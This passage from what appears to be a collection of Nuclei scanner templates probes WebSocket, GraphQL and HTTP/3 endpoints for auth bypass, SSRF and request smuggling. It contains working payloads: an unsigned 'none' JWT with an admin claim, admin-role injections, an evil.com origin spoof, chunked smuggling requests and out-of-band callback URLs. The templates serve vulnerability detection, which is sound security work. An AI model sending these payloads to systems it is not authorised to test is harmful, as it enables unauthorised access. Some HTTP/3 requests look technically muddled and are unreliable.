4: Admin role injection 38 | - data: '{"type":"login","user":"guest","role":"admin"}' 39 | 40 | # Test 5: JWT none algorithm 41 | - data: '{"type":"auth","jwt":"eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9."}' 42 | 43 | # Test 6: Origin bypass callback 44 | - data: '{"type":"validate","callback":"{{callback}}/ws-{{bypass_id}}"}' 45 | 46 | matchers-condition: or 47 | matchers: 48 | - type: word 49 | part: response 50 | words: 51 | - '"authenticated":true' 52 | - '"role":"admin"' 53 | - '"success":true' 54 | - 'Welcome admin' 55 | 56 | - type: word 57 | part: interactsh_protocol 58 | words: 59 | - "http" 60 | - "dns" 61 | 62 | - address: "wss://{{Hostname}}/ws" 63 | origin: "https://evil.com" 64 | 65 | inputs: 66 | # Test origin validation bypass 67 | - data: '{"type":"connect","origin":"evil.com"}' 68 | 69 | matchers: 70 | - type: word 71 | part: response 72 | words: 73 | - "connected" 74 | - "authenticated" 75 | negative: false 76 | 77 | - address: "ws://{{Hostname}}/socket.io/?transport=websocket" 78 | 79 | inputs: 80 | # Socket.IO specific bypass 81 | - data: '42["authenticate",{"token":"bypass","admin":true}]' 82 | - data: '42["join",{"room":"admin","bypass":true}]' 83 | 84 | matchers: 85 | - type: regex 86 | part: response 87 | regex: 88 | - '43\["authenticated"' 89 | - '"sid":"[a-zA-Z0-9]+"' 90 | 91 | - address: "ws://{{Hostname}}/graphql-ws" 92 | 93 | inputs: 94 | # GraphQL subscription bypass 95 | - data: '{"type":"connection_init","payload":{"authorization":""}}' 96 | - data: '{"type":"start","payload":{"query":"subscription { adminData }"}}' 97 | 98 | matchers: 99 | - type: word 100 | part: response 101 | words: 102 | - "connection_ack" 103 | - '"data":' -------------------------------------------------------------------------------- /websocket-subscription-oob.yaml: -------------------------------------------------------------------------------- 1 | id: websocket-subscription-oob 2 | 3 | info: 4 | name: WebSocket Subscription Callback OOB Detection 5 | author: geeknik 6 | severity: medium 7 | description: | 8 | Detects WebSocket endpoints that support event subscriptions with external callback URLs, 9 | potentially leading to SSRF through subscription webhooks, event notifications, or 10 | real-time data streaming to external endpoints. 11 | reference: 12 | - https://developer.mozilla.org/en-US/docs/Web/API/WebSockets_API 13 | - https://socket.io/docs/v4/ 14 | - https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking 15 | classification: 16 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 17 | cvss-score: 5.5 18 | cwe-id: CWE-918 19 | tags: websocket,oob,ssrf,subscription,callback,events 20 | 21 | variables: 22 | callback_url: "{{interactsh-url}}" 23 | 24 | websocket: 25 | - address: "{{BaseURL}}" 26 | path: 27 | - "/ws" 28 | - "/websocket" 29 | - "/socket.io/" 30 | - "/api/ws" 31 | - "/realtime" 32 | 33 | inputs: 34 | - data: | 35 | { 36 | "type": "subscribe", 37 | "event": "user.update", 38 | "callback_url": "{{callback_url}}/webhook", 39 | "webhook": "{{callback_url}}/events" 40 | } 41 | - data: | 42 | { 43 | "action": "notification_config", 44 | "config": { 45 | "endpoint": "{{callback_url}}/notify", 46 | "events": ["message", "connect", "disconnect"], 47 | "format": "json" 48 | } 49 | } 50 | - data: | 51 | { 52 | "command": "webhook_setup", 53 | "webhook_url": "{{callback_url}}/callback", 54 | "events": ["*"], 55 | "retry_failed": true, 56 | "external_webhook": "{{callback_url}}/external" 57 | } 58 | 59 | - address: "{{BaseURL}}" 60 | path: 61 | - "/ws/stream" 62 | - "/websocket/feed" 63 | - "/api/ws/live" 64 | 65 | inputs: 66 | - data: | 67 | { 68 | "type": "stream_config", 69 | "destination": "{{callback_url}}/stream", 70 | "format": "json", 71 | "real_time": true, 72 | "callback_on_error": "{{callback_url}}/error" 73 | } 74 | 75 | - address: "{{BaseURL}}" 76 | path: 77 | - "/ws/integration" 78 | - "/websocket/external" 79 | - "/api/ws/third-party" 80 | 81 | inputs: 82 | - data: | 83 | { 84 | "type": "integration", 85 | "integration": { 86 | "type": "webhook", 87 | "url": "{{callback_url}}/integration", 88 | "auth_callback": "{{callback_url}}/auth", 89 | "data_endpoint": "{{callback_url}}/data" 90 | } 91 | } 92 | - data: | 93 | { 94 | "action": "external_subscription", 95 | "external_url": "{{callback_url}}/subscribe", 96 | "callback_events": ["all"] 97 | } 98 | 99 | matchers: 100 | - type: word 101 | part: interactsh_protocol 102 | words: 103 | - "http" 104 | - "dns" 105 | condition: or -------------------------------------------------------------------------------- /http3-protocol-downgrade-attack.yaml: -------------------------------------------------------------------------------- 1 | id: http3-protocol-downgrade-attack 2 | 3 | info: 4 | name: HTTP/3 to HTTP/2 Protocol Downgrade Attack Detection 5 | author: geeknik 6 | severity: medium 7 | description: | 8 | Detects servers vulnerable to HTTP/3 to HTTP/2 protocol downgrade attacks 9 | where malicious clients can force fallback to HTTP/2 for exploitation of 10 | HTTP/2-specific vulnerabilities while maintaining HTTP/3 session context. 11 | Tests Alt-Svc header manipulation and QUIC connection degradation vectors. 12 | reference: 13 | - https://tools.ietf.org/html/rfc9114 14 | - https://datatracker.ietf.org/doc/html/rfc7838 15 | - https://datatracker.ietf.org/doc/html/rfc9000 16 | - https://blog.cloudflare.com/http-3-the-past-present-and-future/ 17 | classification: 18 | cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N 19 | cvss-score: 4.8 20 | cwe-id: CWE-757,CWE-693 21 | tags: http3,http2,protocol-downgrade,quic,alt-svc,tls 22 | 23 | variables: 24 | callback_url: "{{interactsh-url}}" 25 | downgrade_id: "{{randstr}}" 26 | 27 | http: 28 | - method: GET 29 | path: 30 | - "{{BaseURL}}/" 31 | - "{{BaseURL}}/api/" 32 | - "{{BaseURL}}/secure/" 33 | - "{{BaseURL}}/admin/" 34 | 35 | headers: 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 37 | Alt-Used: "{{callback_url}}" 38 | Alt-Svc: 'h3=":443"; ma=86400, h2=":443"; ma=86400' 39 | HTTP2-Settings: "AAMAAABkAARAAAAAAAIAAAAA" 40 | Connection: "HTTP2-Settings, Upgrade, close" 41 | Upgrade: "h2c" 42 | 43 | matchers-condition: and 44 | matchers: 45 | - type: word 46 | part: header 47 | words: 48 | - "alt-svc" 49 | - "Alt-Svc" 50 | condition: or 51 | case-insensitive: true 52 | 53 | - type: word 54 | part: header 55 | words: 56 | - "h3=" 57 | - "h2=" 58 | condition: or 59 | case-insensitive: true 60 | 61 | - type: status 62 | status: 63 | - 101 64 | - 426 65 | condition: or 66 | 67 | - method: GET 68 | path: 69 | - "{{BaseURL}}/.well-known/alt-svc" 70 | - "{{BaseURL}}/.well-known/quic-alt-svc" 71 | 72 | headers: 73 | Accept: application/json 74 | User-Agent: "HTTP3-Downgrade-Test/1.0" 75 | 76 | matchers: 77 | - type: word 78 | part: body 79 | words: 80 | - "quic" 81 | - "h3-" 82 | - "h2" 83 | condition: and 84 | case-insensitive: true 85 | 86 | - method: POST 87 | path: 88 | - "{{BaseURL}}/api/version" 89 | - "{{BaseURL}}/protocol/negotiate" 90 | 91 | headers: 92 | Content-Type: "application/json" 93 | Alt-Svc-Clear: "1" 94 | 95 | body: | 96 | { 97 | "protocol_versions": ["h3", "h2", "http/1.1"], 98 | "force_downgrade": true, 99 | "callback_url": "{{callback_url}}/protocol-{{downgrade_id}}" 100 | } 101 | 102 | matchers: 103 | - type: word 104 | part: interactsh_protocol 105 | words: 106 | - "http" 107 | - "dns" 108 | condition: or 109 | 110 | extractors: 111 | - type: regex 112 | part: header 113 | regex: 114 | - "alt-svc:\\s*([^\\r\\n]+)" 115 | group: 1 -------------------------------------------------------------------------------- /graphql-subscription-oob.yaml: -------------------------------------------------------------------------------- 1 | id: graphql-subscription-oob 2 | 3 | info: 4 | name: GraphQL Subscription OOB Callback Detection 5 | author: geeknik 6 | severity: medium 7 | description: | 8 | Detects GraphQL endpoints that support subscriptions with external callback URLs, 9 | potentially leading to SSRF via subscription webhook notifications or schema fetching. 10 | reference: 11 | - https://graphql.org/blog/subscriptions-in-graphql-and-relay/ 12 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery 13 | classification: 14 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N 15 | cvss-score: 5.8 16 | cwe-id: CWE-918 17 | tags: graphql,oob,ssrf,subscription,callback 18 | 19 | variables: 20 | callback_url: "{{interactsh-url}}" 21 | 22 | http: 23 | - method: POST 24 | path: 25 | - "{{BaseURL}}/graphql" 26 | - "{{BaseURL}}/api/graphql" 27 | - "{{BaseURL}}/v1/graphql" 28 | - "{{BaseURL}}/query" 29 | 30 | headers: 31 | Content-Type: application/json 32 | Accept: application/json 33 | 34 | body: | 35 | { 36 | "query": "subscription { __schema { subscriptionType { fields { name description args { name type { name } } } } } }", 37 | "variables": {} 38 | } 39 | 40 | matchers-condition: and 41 | matchers: 42 | - type: word 43 | part: body 44 | words: 45 | - '"subscriptionType"' 46 | - '"fields"' 47 | condition: and 48 | 49 | - type: status 50 | status: 51 | - 200 52 | 53 | - method: POST 54 | path: 55 | - "{{BaseURL}}/graphql" 56 | - "{{BaseURL}}/api/graphql" 57 | - "{{BaseURL}}/v1/graphql" 58 | - "{{BaseURL}}/query" 59 | 60 | headers: 61 | Content-Type: application/json 62 | Accept: application/json 63 | 64 | body: | 65 | { 66 | "query": "mutation RegisterWebhook($url: String!) { registerWebhook(callbackUrl: $url) { id status } }", 67 | "variables": { 68 | "url": "{{callback_url}}" 69 | } 70 | } 71 | 72 | - method: POST 73 | path: 74 | - "{{BaseURL}}/graphql" 75 | - "{{BaseURL}}/api/graphql" 76 | - "{{BaseURL}}/v1/graphql" 77 | - "{{BaseURL}}/query" 78 | 79 | headers: 80 | Content-Type: application/json 81 | Accept: application/json 82 | 83 | body: | 84 | { 85 | "query": "mutation CreateSubscription($callback: String!) { createSubscription(webhookUrl: $callback) { subscriptionId } }", 86 | "variables": { 87 | "callback": "{{callback_url}}" 88 | } 89 | } 90 | 91 | - method: POST 92 | path: 93 | - "{{BaseURL}}/graphql" 94 | - "{{BaseURL}}/api/graphql" 95 | - "{{BaseURL}}/v1/graphql" 96 | - "{{BaseURL}}/query" 97 | 98 | headers: 99 | Content-Type: application/json 100 | Accept: application/json 101 | 102 | body: | 103 | { 104 | "query": "mutation ImportSchema($url: String!) { importSchema(schemaUrl: $url) { success errors } }", 105 | "variables": { 106 | "url": "{{callback_url}}/schema.graphql" 107 | } 108 | } 109 | 110 | matchers: 111 | - type: word 112 | part: interactsh_protocol 113 | words: 114 | - "http" 115 | - "dns" 116 | condition: or 117 | -------------------------------------------------------------------------------- /http3-quic-smuggling.yaml: -------------------------------------------------------------------------------- 1 | id: http3-quic-smuggling 2 | 3 | info: 4 | name: HTTP/3 QUIC Request Smuggling Detection 5 | author: geeknik 6 | severity: critical 7 | description: | 8 | Detects ACTUAL HTTP/3 request smuggling vulnerabilities by exploiting 9 | differences in HTTP/3 to HTTP/2 translation at reverse proxies. Tests 10 | for stream confusion, header injection, and protocol downgrade attacks 11 | that lead to request smuggling. 12 | reference: 13 | - https://portswigger.net/research/http3-connection-contamination 14 | - https://www.blackhat.com/us-23/briefings/schedule/#http3-quic-attacks 15 | classification: 16 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L 17 | cvss-score: 9.0 18 | cwe-id: CWE-444 19 | tags: http3,quic,smuggling,critical 20 | 21 | variables: 22 | smuggle_id: "{{randstr}}" 23 | callback: "{{interactsh-url}}" 24 | 25 | http: 26 | # Test 1: HTTP/3 Alt-Svc downgrade smuggling 27 | - raw: 28 | - | 29 | GET / HTTP/1.1 30 | Host: {{Hostname}} 31 | Alt-Svc: clear 32 | Alt-Svc: h3-29=":443"; ma=0 33 | Connection: close 34 | 35 | - | 36 | GET /admin HTTP/1.1 37 | Host: {{Hostname}} 38 | X-HTTP3-Stream-ID: 0 39 | Transfer-Encoding: chunked 40 | Content-Length: 4 41 | 42 | 0 43 | 44 | GET /internal HTTP/1.1 45 | Host: internal.local 46 | X-Smuggled: {{smuggle_id}} 47 | 48 | unsafe: true 49 | 50 | matchers: 51 | - type: dsl 52 | dsl: 53 | - 'contains(body_2, "admin") || contains(body_2, "forbidden") || status_code_2 == 403' 54 | - 'contains(header_1, "alt-svc")' 55 | condition: and 56 | 57 | # Test 2: QUIC stream confusion attack 58 | - raw: 59 | - | 60 | GET / HTTP/3 61 | Host: {{Hostname}} 62 | :method: GET 63 | :path: / 64 | :scheme: https 65 | :authority: {{Hostname}} 66 | x-http3-stream-id: 1 67 | x-http3-stream-weight: 256 68 | 69 | - | 70 | GET /{{callback}}/http3-stream-{{smuggle_id}} HTTP/3 71 | Host: {{Hostname}} 72 | :method: GET 73 | :path: /admin 74 | :scheme: https 75 | :authority: internal.{{Hostname}} 76 | x-http3-stream-id: 1 77 | x-http3-stream-dependency: 0 78 | 79 | matchers-condition: or 80 | matchers: 81 | - type: word 82 | part: interactsh_protocol 83 | words: 84 | - "http" 85 | 86 | - type: dsl 87 | dsl: 88 | - 'status_code_2 != status_code_1 && status_code_2 == 200' 89 | 90 | # Test 3: HTTP/3 header injection via QPACK 91 | - raw: 92 | - | 93 | GET / HTTP/3 94 | Host: {{Hostname}} 95 | :method: GET 96 | :path: /?cb={{callback}}/qpack-{{smuggle_id}} 97 | :scheme: https 98 | :authority: {{Hostname}} 99 | :status: 200 100 | x-qpack-table-size: 4096 101 | x-qpack-blocked-streams: 100 102 | 103 | matchers: 104 | - type: word 105 | part: interactsh_protocol 106 | words: 107 | - "http" 108 | - "dns" 109 | 110 | # Test 4: Connection coalescing attack 111 | - raw: 112 | - | 113 | GET / HTTP/3 114 | Host: {{Hostname}} 115 | :method: CONNECT 116 | :authority: {{callback}}:443 117 | :scheme: https 118 | :protocol: websocket 119 | origin: https://{{Hostname}} 120 | 121 | matchers: 122 | - type: word 123 | part: interactsh_protocol 124 | words: 125 | - "http" 126 | - "dns" --------------------------------------------------------------------------------